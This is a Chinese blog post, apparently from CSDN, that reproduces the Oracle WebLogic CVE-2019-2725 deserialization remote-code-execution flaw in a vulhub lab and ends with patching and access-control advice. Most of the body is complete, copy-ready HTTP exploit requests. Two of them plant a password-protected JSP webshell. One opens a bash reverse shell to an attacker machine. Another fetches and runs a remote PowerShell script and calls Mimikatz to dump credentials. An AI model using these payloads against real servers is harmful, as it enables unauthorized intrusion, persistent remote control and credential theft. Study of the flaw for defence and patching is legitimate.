Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)

最新推荐文章于 2024-09-20 18:27:53 发布
最新推荐文章于 2024-09-20 18:27:53 发布
阅读量2.6k 收藏 6
点赞数 2
分类专栏: CVE漏洞复现 WebLogic漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41182861/article/details/108663413
版权

漏洞简述

  • 2019年4月17日,CNVD 发布《关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告》,公告指出部分版本WebLogic中默认包含的wls9_async_response包,为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意 HTTP 请求,获得目标服务器的权限,在未授权的情况下远程执行命令。

  • 漏洞编号:CVE-2019-2725

  • 影响版本:10.3.6.0、12.1.3.0

  • 测试环境:Linux || vulhub || Weblogic 10.3.6.0

复现开始

  • 访问访问http://your-ip/_async/AsyncResponseService。如果出现下图页面,则有可能会存在漏洞。
    在这里插入图片描述
  • Windows/Linux 通用写入shell代码(一):
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.222.129:7001
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

  • 发送上述请求包,再发起下面的请求,即可命令执行

    • http://192.168.222.129:7001/_async/webshell.jsp?pwd=123&cmd=whoami

  • Windows/Linux 通用写入shell代码(二):

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.222.129:7001
Content-Length: 1136
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string><void method="println"><string><![CDATA[
<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>]]>
</string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  • 发送上述请求包,再发起下面的请求,即可命令执行
    • http://192.168.222.129:7001/bea_wls_internal/webshell.jsp?pwd=123&cmd=whoami
PS上述报文中servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/均为默认路径,如果路径修改,可以配合反弹shell进行获取。
Linux 反弹shell
  • 在攻击机192.168.222.133(实战中需是VPS)上侦听6666端口:nc -lvnp 6666
  • 在原攻击机上发送下面的请求包:
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.222.129:7001
Content-Length: 1142
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" 
xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.222.133/6666 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
  • 攻击机192.168.222.133即可GetShell
Linux 反弹shell
  • 同理
POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.222.155:7001
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

修复建议

可以采取以下4种方式进行防护:

  • 1、官方发布针对此漏洞的紧急修复补丁,及时打上官方CVE-2019-2725补丁包,下载地址如下:https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html?from=timeline

  • 2、升级本地JDK版本
    因为Weblogic所采用的是其安装文件中默认1.6版本的JDK文件,属于存在反序列化漏洞的JDK版本,因此升级到JDK7u21以上版本可以避免由于Java原生类反序列化漏洞造成的远程代码执行。

  • 3、配置URL访问控制策略
    部署于公网的WebLogic服务器,可通过ACL禁止对/_async/*及/wls-wsat/*路径的访问。

  • 4、删除不安全文件
    删除wls9_async_response.war与wls-wsat.war文件及相关文件夹,并重启Weblogic服务。具体文件路径如下:10.3.*版本、12.1.3版本。

PS:wls9_async_response.war及wls-wsat.war属于一级应用包,对其进行移除或更名操作可能造成未知的后果,Oracle官方不建议对其进行此类操作。若在直接删除此包的情况下应用出现问题,将无法得到Oracle产品部门的技术支持。请用户自行进行影响评估,并对此文件进行备份后,再执行此操作。
weblogic反序列化漏洞复现( CVE-2019-2725
千寻的博客
12-02 5202
文章目录漏洞名称漏洞编号漏洞描述影响版本漏洞存在复现第一步 访问控制台第二步 使用weblogicScan进行扫描,发现存在该漏洞漏洞复现一(poc)执行命令:上传webshell漏洞复现二下载地址漏洞检查命令执行上传哥斯特马,并进行连接哥斯特与msf联动免责声明 漏洞名称 weblogic反序列化远程命令执行漏洞 漏洞编号 CVE-2019-2725 漏洞描述 CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞, 这个漏洞依旧是根据weblogic的xm
Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)
时乙的博客
12-08 530
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。可以看做是CVE-2017-10271的又一入口。
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .txt
06-27
weblogic反序列化漏洞(绕过CVE-2019-2725)-检测POC .网上几乎没有,请珍惜。
Weblogic反序列化漏洞CVE-2019-2725
chaojixiaojingang
01-29 4770
1.漏洞描述 wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 2.影响版本 Weblogic 10.x Weblogic 12.1.3 3.漏洞环境搭建 在docker中搭建weblogic环境,进入/vulhub/weblogic/CVE-2017-10271目录 ...
Weblogic漏洞CVE-2019-2725
qq_68186313的博客
08-06 371
wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogici部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意HTTP请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。1、拼接访问_async/AsyncResponseService,出现页面,存在漏洞。2、在当前页面抓包,修改请求包写入shell。
CVE-2019-2725
XINO
02-13 1883
在学习内网过程中遇到了weblogic比较常见的漏洞,编号是cve-2019-2725,之前没有总结过,于是本篇文章给大家总结归纳一下该漏洞的利用方法与原理。简单分析了一下cve-2019-2725漏洞的原理以及攻击修复方法,因为之前没有总结所以特地写一个文章总结一下,如果对大家有帮助不妨一键三连支持一下。
weblogic_CVE-2019-2725
Longwaer
01-16 1605
通过笔记学习Weblogic漏洞原理,快速掌握复现技巧。
Weblogic wls9_async_response 反序列化远程命令执行漏洞CVE-2019-2725)复现
ditanji3425的博客
05-06 2268
一、 漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8。 CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为“高危”。 漏洞概述 2019年4月17日,国家信息安全漏洞共享平台(CNVD)收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它允许攻击者通过发送恶意构造的序列化对象来执行任意代码,从而获得对服务器的完全控制。这个漏洞存在于WebLogic ...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
Weblogic反序列化远程代码执行漏洞CVE-2018-2893)是Oracle WebLogic Server中一个严重安全问题,它涉及到组件T3协议处理中的对象反序列化过程。该漏洞允许攻击者通过构造恶意的T3请求,远程执行任意代码,从而...
WebLogic CVE-2019-2725补丁.zip
07-16
weblogic反序列化补丁包
Weblogic:Weblogic CVE-2019-2725 CVE-2019-2729 Getshell命令执行
03-11
weblogic CVE-2019-2725 CVE-2019-2729 POC 执行命令并回显 usage: 单个目标 python3 weblogic_get_webshell.py http://url 批量目标,将批量url放入url_list.txt python3 weblogic_get_webshell.py all
cve-2019-2725修复相关的补丁p29694149_10360190115_Generic.zip
06-03
cve-2019-2725修复相关的补丁和jdk等 cve-2019-2725补丁安装过程中使用到的材料 仅用于学习,如果用于商业,产生版权纠纷,与本人无关。
Weblogic反序列化远程代码执行漏洞CVE-2019-2725)复现
hackzkaq的博客
03-10 4488
更多黑客技能 公众号:小道黑客 0x01 漏洞描述: wls9-async等组件为WebLogic Server提供异步通讯服务,默认应用于WebLogic部分版本。由于该WAR包在反序列化处理输入信息时存在缺陷,攻击者通过发送精心构造的恶意 HTTP 请求,即可获得目标服务器的权限,在未授权的情况下远程执行命令。 0x02 影响版本: Oracle WebLogic Server10.x Oracle WebLogic Server12.1.3.0.0 0x03 影响组件: wls9_async_res
weblogic CVE-2019-2725 靶场攻略
最新发布
shw_yzh的博客
09-20 2134
漏洞描述漏洞描述wls9-async等组件为WebLogic Server提供异步通讯服务,默认应⽤于WebLogic部分版本。由于该WAR包在反序列化处理输⼊信息时存在缺陷,攻击者通过发送精⼼构造的恶意 HTTP 请求,即可获得⽬标服务器的权限,在未授权的情况下远程执⾏命令。影响版本环境搭建漏洞复现1.漏洞验证如果出现⼀下⻚⾯,则说明存在漏洞
Weblogic反序列化远程命令执行(CVE-2019-2725)
m0_65150886的博客
12-27 1363
CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。5.将GET改为POST,随后请求包部分除了第一行第二行保留,其他全部替换如下payload。2.可以访问/_async/AsyncResponseService,则存在漏洞。6.使用payload上传jsp木马。1.访问ip:port。1.升级本地JDK环境。4.开启http服务。
weblogic 远程代码执行 (CVE-2019-2725)
YouthBelief的博客
11-03 2727
@[TOC](weblogic 远程代码执行 (CVE-2019-2725)) weblogic 远程代码执行 (CVE-2019-2725) 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,通过针对Oracle官网历年来的补丁构造payload来绕过。 0x01 漏洞描述 Oracle WebLogic Server是美国甲骨文(Oracle)公司的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管
CVE-2019-2725复现(从环境搭建到getshell)
1stPeak's Blog
07-16 9540
前言 今天复现CVE-2019-2725时从环境搭建到getshell,这一篇文章是我测试之后总结的一次完整的复现测试流程,供大家参考,如有不足,欢迎指正。 漏洞描述 Oracle WebLogic Server反序列化漏洞 ,该远程代码执行漏洞无需身份验证即可远程利用,即无需用户名和密码即可通过网络利用。 影响版本 Oracle WebLogic Server,版本 10.3.6.0、12.1.3.0 测试环境准备 注:我这里主要介绍linux下weblogic的搭建 1、Ubuntu 我用的ubuntu
weblogic(CVE-2019-2725)漏洞复现
来到了学渣的博客
12-16 9191
最近打攻防演练的时候碰到了这个漏洞,趁热打个铁复现一下漏洞 这个漏洞对比shiro来说还是比较新鲜的,他是去年新出的一款漏洞,19年4月 受影响版本 Oracle WebLogic Server 10.* Oracle WebLogic Server 12.1.3 影响组件: bea_wls9_async_response.war wsat.war 漏洞存在的页面: /_async/AsyncResponseService poc如下 POST /_async/AsyncResponseServ
Weblogic远程代码执行漏洞CVE-2019-2725补丁分析
描述为:“p29204678_1036_Generic-patch-catalog_26516.zip,CVE-2019-2725漏洞补丁p29204678_1036_Generic-patch-catalog_26516.zip U5I2.jar Weblogic反序列化远程代码执行漏洞CVE-2019-2725)分析报告中招...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值